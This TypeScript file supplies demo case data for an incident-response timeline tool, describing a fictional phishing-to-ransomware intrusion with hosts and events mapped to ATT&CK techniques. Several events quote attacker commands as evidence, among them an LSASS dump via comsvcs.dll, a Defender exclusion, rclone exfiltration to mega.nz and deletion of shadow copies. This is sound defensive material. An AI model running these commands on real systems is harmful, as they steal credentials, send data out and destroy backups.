/** The example investigation shipped with the tool (same data as the prototype's demo). */
import type { CaseState, Event, Host } from '../domain/types.js';
import { emptyState } from '../ops/reducer.js';

const H = (
  id: string,
  name: string,
  ip: string,
  os: string,
  role: string,
  zone: string,
  status: Host['status'],
  crit: Host['crit'],
  notes = '',
): Host => ({ id, name, ip, os, role, zone, status, crit, owner: '', tags: [], notes });

const E = (
  id: string,
  ts: string,
  hostId: string,
  srcHostId: string,
  user: string,
  priv: string,
  activity: string,
  cmd: string,
  itype: string,
  indicator: string,
  tactic: string,
  technique: string,
  source: string,
  conf: Event['conf'],
  sev: Event['sev'],
  key: boolean,
  notes = '',
): Event => ({
  id,
  ts,
  off: 0,
  hostId,
  srcHostId,
  user,
  priv,
  activity,
  cmd,
  itype,
  indicator,
  tactic,
  technique,
  source,
  link: '',
  conf,
  sev,
  key,
  tags: [],
  evidence: '',
  notes,
});

export const DEMO_SUMMARY =
  'Commodity loader delivered by phishing to a finance workstation on 14 July 2026. The operator dumped LSASS within 25 minutes, recovered credentials for an over-privileged backup service account, and used pass-the-hash to reach a file server and then the domain controller. DCSync gave them the full domain. Roughly 39 GB of finance data was staged and exfiltrated to cloud storage before backups were destroyed and ransomware was staged for domain-wide deployment. Containment cut C2 at 17:58Z, before encryption ran.\n\nThis is example data shipped with the tool — replace it with your own case.';

export function demoCaseState(now: string = '2026-07-15T09:00:00.000Z'): CaseState {
  const s = emptyState(now);
  s.case = {
    name: 'Operation Glasshouse',
    number: 'IR-2026-0142',
    analyst: 'J. Meyer',
    classification: 'TLP:AMBER+STRICT',
    summary: DEMO_SUMMARY,
    created: now,
    modified: now,
  };
  const hosts = [
    H(
      'h_wks',
      'WKS-FIN-014',
      '10.20.4.31',
      'Windows 11 23H2',
      'Finance workstation',
      'Corp / VLAN 20',
      'compromised',
      'moderate',
      'Patient zero. Imaged 2026-07-15, memory captured before shutdown.',
    ),
    H(
      'h_file',
      'SRV-FILE-02',
      '10.20.9.10',
      'Windows Server 2019',
      'Departmental file server',
      'Server / VLAN 90',
      'compromised',
      'high',
      'Staging point for collection and exfiltration.',
    ),
    H(
      'h_dc',
      'DC-CORP-01',
      '10.20.1.5',
      'Windows Server 2022',
      'Domain controller',
      'Core / VLAN 10',
      'compromised',
      'crown jewel',
      'DCSync observed. Full domain credential reset required.',
    ),
    H(
      'h_bkp',
      'SRV-BKP-01',
      '10.20.9.44',
      'Windows Server 2019',
      'Backup server',
      'Server / VLAN 90',
      'compromised',
      'crown jewel',
      'Backup catalog deleted; offsite copies verified intact.',
    ),
    H(
      'h_vpn',
      'VPN-GW-01',
      '172.16.0.2',
      'FortiOS 7.2',
      'Remote access gateway',
      'Edge',
      'clean',
      'high',
      'Reviewed — no evidence of attacker use.',
    ),
  ];
  const events = [
    E(
      'ev_demo_01',
      '2026-07-14T13:02:11Z',
      'h_wks',
      '',
      'CORP\\j.reyes',
      'standard user',
      'Phishing email delivered with macro-enabled attachment',
      '',
      'sha256',
      '9f2b1c7a44d3e5f6081a2b3c4d5e6f708192a3b4c5d6e7f8091a2b3c4d5e6f70',
      'TA0001',
      'T1566.001',
      'Email gateway',
      'confirmed',
      'high',
      true,
      'Sender spoofed a known supplier domain. 3 other recipients did not open the file.',
    ),
    E(
      'ev_demo_02',
      '2026-07-14T13:11:47Z',
      'h_wks',
      '',
      'CORP\\j.reyes',
      'standard user',
      'Macro executed, EXCEL.EXE spawned encoded PowerShell',
      'powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0AC4A...',
      'filename',
      'Invoice_Q3_2026.xlsm',
      'TA0002',
      'T1059.001',
      'EDR',
      'confirmed',
      'high',
      true,
    ),
    E(
      'ev_demo_03',
      '2026-07-14T13:12:09Z',
      'h_wks',
      '',
      'CORP\\j.reyes',
      'standard user',
      'First C2 beacon over HTTPS, 60s interval with jitter',
      '',
      'ip',
      '185.243.115.44',
      'TA0011',
      'T1071.001',
      'Zeek',
      'confirmed',
      'critical',
      true,
      'Beacon persisted until containment at 17:58Z. JA3 matched a known commodity loader.',
    ),
    E(
      'ev_demo_04',
      '2026-07-14T13:14:52Z',
      'h_wks',
      '',
      'CORP\\j.reyes',
      'standard user',
      'Local and domain reconnaissance',
      'whoami /all\nnet group "domain admins" /domain\nnltest /domain_trusts',
      '',
      '',
      'TA0007',
      'T1087.002',
      'Sysmon',
      'confirmed',
      'medium',
      false,
    ),
    E(
      'ev_demo_05',
      '2026-07-14T13:26:30Z',
      'h_wks',
      '',
      'CORP\\j.reyes',
      'SYSTEM',
      'LSASS memory dumped via signed binary proxy',
      'rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 712 C:\\ProgramData\\lsass.dmp full',
      'filepath',
      'C:\\ProgramData\\lsass.dmp',
      'TA0006',
      'T1003.001',
      'EDR',
      'confirmed',
      'critical',
      true,
      'UAC bypass preceded this at 13:24Z (fodhelper). svc_backup hash recovered from this dump.',
    ),
    E(
      'ev_demo_06',
      '2026-07-14T13:40:15Z',
      'h_wks',
      '',
      'CORP\\j.reyes',
      'local admin',
      'Defender real-time protection exclusion added for C:\\ProgramData',
      'powershell -c "Add-MpPreference -ExclusionPath C:\\ProgramData"',
      'registry',
      'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths',
      'TA0005',
      'T1562.001',
      'Windows Event Log',
      'confirmed',
      'high',
      false,
    ),
    E(
      'ev_demo_07',
      '2026-07-14T14:02:44Z',
      'h_file',
      'h_wks',
      'CORP\\svc_backup',
      'domain admin',
      'Pass-the-hash authentication to admin share',
      '',
      'useraccount',
      'CORP\\svc_backup',
      'TA0008',
      'T1550.002',
      'Windows Event Log',
      'confirmed',
      'critical',
      true,
      'Event 4624 logon type 3, NTLM, from 10.20.4.31. svc_backup was unnecessarily a Domain Admin.',
    ),
    E(
      'ev_demo_08',
      '2026-07-14T14:05:12Z',
      'h_file',
      'h_wks',
      'CORP\\svc_backup',
      'domain admin',
      'Tooling copied to target over SMB',
      'copy \\\\10.20.4.31\\C$\\ProgramData\\rc.exe C:\\Windows\\Temp\\rc.exe',
      'filename',
      'rclone.exe',
      'TA0008',
      'T1570',
      'EDR',
      'confirmed',
      'high',
      false,
    ),
    E(
      'ev_demo_09',
      '2026-07-14T14:31:58Z',
      'h_dc',
      'h_file',
      'CORP\\svc_backup',
      'domain admin',
      'Kerberoasting — SPN ticket requests for 14 service accounts',
      '',
      '',
      '',
      'TA0006',
      'T1558.003',
      'Windows Event Log',
      'high',
      'high',
      false,
      'Event 4769 burst, RC4 encryption requested.',
    ),
    E(
      'ev_demo_10',
      '2026-07-14T15:10:03Z',
      'h_dc',
      'h_file',
      'CORP\\svc_backup',
      'domain admin',
      'DCSync — directory replication of all domain secrets',
      '',
      'useraccount',
      'CORP\\krbtgt',
      'TA0006',
      'T1003.006',
      'Microsoft Sentinel',
      'confirmed',
      'critical',
      true,
      'krbtgt hash must be reset twice. Treat the entire domain as compromised.',
    ),
    E(
      'ev_demo_11',
      '2026-07-14T15:44:21Z',
      'h_file',
      '',
      'CORP\\svc_backup',
      'domain admin',
      'Finance share archived into staging directory',
      '7z.exe a -mx1 -p C:\\Windows\\Temp\\arch.7z \\\\SRV-FILE-02\\finance\\*',
      'filepath',
      'C:\\Windows\\Temp\\arch.7z',
      'TA0009',
      'T1560.001',
      'EDR',
      'confirmed',
      'high',
      true,
      'Approximately 41 GB staged. Contents under review by Legal.',
    ),
    E(
      'ev_demo_12',
      '2026-07-14T16:20:37Z',
      'h_file',
      '',
      'CORP\\svc_backup',
      'domain admin',
      'Archive transferred to cloud storage over TLS',
      'rc.exe copy C:\\Windows\\Temp\\arch.7z remote:bk --transfers 8',
      'domain',
      'mega.nz',
      'TA0010',
      'T1567.002',
      'Proxy',
      'confirmed',
      'critical',
      true,
      '38.6 GB egress confirmed in proxy logs between 16:20Z and 17:02Z.',
    ),
    E(
      'ev_demo_13',
      '2026-07-14T17:02:55Z',
      'h_bkp',
      'h_file',
      'CORP\\svc_backup',
      'domain admin',
      'Shadow copies deleted and backup services stopped',
      'vssadmin.exe delete shadows /all /quiet\nnet stop "Veeam Backup Service" /y',
      '',
      '',
      'TA0040',
      'T1490',
      'Windows Event Log',
      'confirmed',
      'critical',
      true,
    ),
    E(
      'ev_demo_14',
      '2026-07-14T17:35:10Z',
      'h_dc',
      '',
      'CORP\\svc_backup',
      'domain admin',
      'Ransomware staged for domain-wide deployment via new GPO',
      '',
      'filename',
      'svchost32.exe',
      'TA0040',
      'T1486',
      'Microsoft Sentinel',
      'confirmed',
      'critical',
      true,
      'GPO "Windows Update Policy v2" created 17:33Z linked at domain root. Deleted before the scheduled 18:00Z execution.',
    ),
  ];
  for (const h of hosts) s.hosts[h.id] = h;
  for (const e of events) s.events[e.id] = e;
  return s;
}
